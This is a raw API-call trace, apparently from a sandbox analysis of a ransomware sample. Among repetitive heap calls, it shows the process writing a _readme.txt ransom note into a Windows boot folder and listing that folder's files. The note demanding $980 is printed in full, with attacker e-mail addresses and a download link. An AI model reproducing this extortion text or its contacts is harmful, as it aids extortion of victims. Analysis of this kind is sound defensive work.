HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.872] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.873] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.873] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0200.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.873] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.873] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.873] PathFindFileNameW (pszPath="") returned="" [0200.873] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.873] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.873] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0200.874] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b67060 [0200.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.874] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.874] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0200.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.874] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0200.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.875] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.875] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0200.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0200.875] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0200.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0200.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0200.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.875] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.876] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.876] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0200.876] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0200.876] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0200.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b158f8 | out: hHeap=0x2c0000) returned 1 [0200.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0200.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0200.876] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.876] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.876] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.877] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9110 [0200.877] RtlAllocateHeap (HeapHandle=0x2c0000, 